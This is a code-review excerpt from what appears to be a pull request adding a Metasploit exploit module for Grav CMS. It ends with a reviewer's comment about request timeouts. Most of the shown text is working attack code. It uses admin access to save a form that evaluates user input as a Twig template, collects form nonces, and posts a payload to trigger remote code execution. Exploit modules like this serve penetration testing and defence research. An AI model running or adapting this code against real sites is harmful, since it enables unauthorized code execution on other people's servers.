modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb

```diff
@@ -0,0 +1,379 @@
+    fail_with(Failure::UnexpectedReply, 'Could not parse form page') unless html
+
+    form_nonce = html.at('input[@name="form-nonce"]/@value')
+    unique_id = html.at('input[@name="__unique_form_id__"]/@value')
+    fail_with(Failure::UnexpectedReply, 'Could not extract form nonces') unless form_nonce && unique_id
+
+    @form_nonce = form_nonce.text
+    @unique_form_id = unique_id.text
+  end
+
+  def save_form_with_payload
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'pages', @form_folder, ':add'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'task' => 'save',
+        'data[header][title]' => 'Contact Form',
+        'data[content]' => 'Please submit the form',
+        'data[folder]' => @form_folder,
+        'data[route]' => '',
+        'data[name]' => 'form',
+        'data[_json][header][form]' => form_payload_json,
+        '_post_entries_save' => 'edit',
+        '__form-name__' => 'flex-pages',
+        '__unique_form_id__' => @unique_form_id,
+        'form-nonce' => @form_nonce
+      }
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::Unknown, 'Failed to save form') unless [200, 302, 303].include?(res.code)
+  end
+
+  def form_payload_json
+    {
+      'name' => @form_name,
+      'fields' => { 'name' => { 'type' => 'text', 'label' => 'Name', 'required' => true } },
+      'buttons' => { 'submit' => { 'type' => 'submit', 'value' => 'Submit' } },
+      'process' => [{ 'message' => "{{ evaluate_twig(form.value('name')) }}" }]
+    }.to_json
+  end
+
+  def fetch_frontend_nonces
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, @form_folder),
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::NotFound, 'Form page not found') unless res.code == 200
+
+    html = res.get_html_document
+    fail_with(Failure::UnexpectedReply, 'Could not parse frontend form') unless html
+
+    form_nonce = html.at('input[@name="form-nonce"]/@value')
+    unique_id = html.at('input[@name="__unique_form_id__"]/@value')
+    form_name = html.at('input[@name="__form-name__"]/@value')
+    fail_with(Failure::UnexpectedReply, 'Could not extract frontend nonces') unless form_nonce && unique_id
+
+    @frontend_nonce = form_nonce.text
+    @frontend_unique_id = unique_id.text
+    @frontend_form_name = form_name&.text || @form_name
+  end
+
+  def execute_payload
+    print_status('Triggering payload execution...')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, @form_folder),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'data[name]' => twig_payload,
+        '__form-name__' => @frontend_form_name,
+        '__unique_form_id__' => @frontend_unique_id,
+        'form-nonce' => @frontend_nonce
+      }
+    }, 5)
```

Comment:
Could we change the `5` here to respect the `RequestTimeout` or other relevant `TIMEOUT` datastore options here that are pulled in from the `HttpClient` mixin?